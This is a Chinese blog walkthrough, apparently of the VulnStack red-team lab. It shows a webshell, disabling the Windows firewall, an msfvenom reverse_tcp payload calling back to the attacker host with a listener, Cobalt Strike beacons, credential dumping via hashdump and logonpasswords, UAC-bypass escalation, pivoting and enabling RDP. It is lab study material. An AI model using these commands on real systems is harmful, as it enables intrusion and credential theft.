Aizlm HomeArchivesTags
VulnStack

vulstack红队评估(1)

虚拟机配置:

win7:网卡1为外网可访问(192.168.227.128),网卡2为域环境

win2003:网卡1为域环境

win2008:DC,网卡1为域环境

kali:攻击机(192.168.227.129)

1
2
3
4
5
6
7
8
本机名,确定是否有域,DC,网段有多少主机存在
系统版本systeminfo,补丁信息,是否有杀软
确定DC的ip
主机密码搜集mimikatz
通过nmap --script=vuln <ip>扫描ms系列漏洞
445端口对应smb服务是否开启
3389是否开启
是否多层代理

信息收集

端口信息

  • nmap -T4 -sV 192.168.227.128
image-20230210190726306

目录扫描

image-20230210190943319 image-20230210191838100

子域名扫描

没有域名,没必要扫了

Web探针

image-20230210193051015

总的来说:

  • 有web站点,mysql,开通了135、445说明内网可能可以hash传递。
  • phpmyadmin以及备份文件
  • web绝对路径:C:/phpStudy/WWW

代码审计

mysql配置泄露

虽然有账号密码,但root用户不允许远程登录

image-20230210192346824 image-20230210192445068

后渗透

CobaltStike方式

  1. 通过webshell,查询是否有杀软,并关闭防火墙

    1. tasklist /svc 列举进程服务信息
    image-20230212111911803
    1. netsh advfirewall set allprofiles state off #关闭防火墙
    image-20230212112045097

  2. 生成木马,通过冰蝎上传木马,执行木马,CobaltStike成功上线

    1. 生成木马

      image-20230212111614035

    2. 执行木马

      image-20230212112314954

    3. cs查看机器上线

      image-20230212112343236

域内信息收集

  1. 基本信息搜集
1
2
3
4
5
6
7
8
9
10
# 网络信息&主机信息&(存在域)域信息
shell ipconfig /all # 判断是否有域 如果有,一般dns就是DC
shell whoami
shell hostname
net view
shell net time /domain
shell nslookup domain-name
shell net localgroup administrators
shell net user /domain
shell net group "domain controllers" /domain
image-20230212114511437 image-20230212114954004 image-20230212115041854 image-20230212115127552 image-20230212115344012 image-20230212114358248 image-20230212115526684 image-20230212115551903 
1
2
3
4
5
6
本机名:STU1
本地组的管理员权限:Administrator,liukaifeng01 (已获得管理员权限)
域管理员权限:Domain Admins
域控:192.168.52.138 OWA
域内ip:192.168.52.138(DC) 192.168.52.141(域成员) 192.168.52.143(本机)
域内用户:administrators,krbtgt,ligang,liukaifeng01
1
2
3
4
5
#系统信息搜集
shell systeminfo # 查看补丁 系统架构
shell systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  # 英文操作系统
shell systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"   # 中文操作系统
shell echo %PROCESSOR_ARCHITECTURE%    # 查看系统系统结构
image-20230212120139739 image-20230212120247097
  1. 凭据信息搜集
1
2
hashdump
logonpasswords
image-20230212121942634 image-20230212122034167
系统信息收集
1
2
shell ipconfig /all
shell net config Workstation
image-20230212172613204
主机密码收集
1
2
hashdump
logonpasswords

漏洞扫描

  • nmap --script=vuln <ip>

    image-20230212184204892

    存在ms08-067和ms17-010漏洞。

msf方式

  • 生成tcp反向木马,上传

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f exe > shell.exe

  • msf开启监听

    1
    2
    3
    4
    use exploit/multi/handler
    set lhost 192.168.227.129
    set payload windows/meterpreter/reverse_tcp #tcp类型
    exploit

  • 提权(https://www.freebuf.com/articles/web/252594.html)

    1. 直接利用getsystem提权(因为没有uac限制)
    image-20230212165337184
    1. 保存会话后,可以使用msf模块绕过UAC进行提权
    image-20230212170714465
    1. 使用ms系列未修补漏洞提权,如ms16-032、ms17-010等

shell进入命令行,信息收集就和CS域内信息收集差不多了。

内网信息收集

  • 获取网卡信息,获取路由信息
image-20230212170041101

  • 在多层网络的情况下,需要添加路由 run autoroute 192.168.52.0/24

  • 探测域内存活主机 run windows/gather/enum_ad_computers,探测域内所有存活主机use auxiliary/scanner/netbios/nbname

    image-20230212180312605

  • 域控列表:run windows/gather/enum_domains

    image-20230212180415536

  • 扫描smb模块,扫描ms17-010模块(445端口)

    1
    2
    use auxiliary/scanner/smb/smb_version
    use auxiliary/scanner/smb/smb_ms17_010

  • 查看补丁:run post/windows/gather/enum_patchs

  • 安装软件信息:run post/windows/gather/enum_applications

  • arp扫描网段:run post/windows/gather/arp_scanner rhosts=host/24

  • 关闭防火墙,使用nmap扫描:netsh advfirewall set allprofiles state offnmap -sS -sV -O 192.168.52.141

  • nmap漏洞扫描:nmap --script=vuln 192.168.52.141

远程桌面连接

  • 使用msf开启3389端口

    1
    2
    run post/windows/manage/enable_rdp
    netstat -an #查看是否开启成功
    image-20230212173315595

  • mstsc远程连接:

image-20230212173420076

链接

https://v0w.top/2020/07/19/vulnstack1/#4-4-%E6%A8%AA%E5%90%91%E6%8E%A2%E6%B5%8B

https://www.freebuf.com/articles/web/252594.html

Author: Aizlm
Link: https://aizlm.github.io/2023/02/12/VulnStack/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
靶场